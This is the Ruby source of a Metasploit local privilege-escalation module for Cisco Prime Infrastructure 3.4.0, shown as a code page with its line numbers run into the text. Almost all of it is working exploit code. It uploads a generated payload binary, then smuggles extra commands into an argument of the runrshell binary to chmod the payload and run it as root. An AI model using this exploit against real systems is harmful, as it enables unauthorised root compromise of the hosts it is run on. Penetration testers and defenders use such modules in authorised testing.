Path: blob/master/modules/exploits/linux/local/cpi_runrshell_priv_esc.rb
19516 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Msf::Post::File9include Msf::Exploit::EXE10include Msf::Exploit::FileDropper1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Cisco Prime Infrastructure Runrshell Privilege Escalation',17'Description' => %q{18This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The19runrshell binary is meant to execute a shell script as root, but can be abused to inject20extra commands in the argument, allowing you to execute anything as root.21},22'License' => MSF_LICENSE,23'Author' => [24'Pedro Ribeiro <pedrib[at]gmail.com>', # First discovery25'sinn3r' # Metasploit module26],27'Platform' => ['linux'],28'Arch' => [ARCH_X86, ARCH_X64],29'SessionTypes' => ['shell', 'meterpreter'],30'DisclosureDate' => '2018-12-08',31'Privileged' => true,32'References' => [33['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/cisco-prime-infrastructure.txt#L56'],34],35'Targets' => [36[ 'Cisco Prime Infrastructure 3.4.0', {} ]37],38'DefaultTarget' => 0,39'Notes' => {40'Reliability' => UNKNOWN_RELIABILITY,41'Stability' => UNKNOWN_STABILITY,42'SideEffects' => UNKNOWN_SIDE_EFFECTS43}44)45)4647register_advanced_options [48OptString.new('WritableDir', [true, 'A directory where we can write the payload', '/tmp'])49]50end5152def exec_as_root(cmd)53command_string = "/opt/CSCOlumos/bin/runrshell '\" && #{cmd} #'"54vprint_status(cmd_exec(command_string))55end5657def exploit58payload_name = "#{Rex::Text.rand_text_alpha(10)}.bin"59exe_path = Rex::FileUtils.normalize_unix_path(datastore['WritableDir'], payload_name)60print_status("Uploading #{exe_path}")61write_file(exe_path, generate_payload_exe)62unless file?(exe_path)63print_error("Failed to upload #{exe_path}")64return65end6667register_file_for_cleanup(exe_path)68print_status('chmod the file with +x')69exec_as_root("/bin/chmod +x #{exe_path}")70print_status("Executing #{exe_path}")71exec_as_root(exe_path)72end73end747576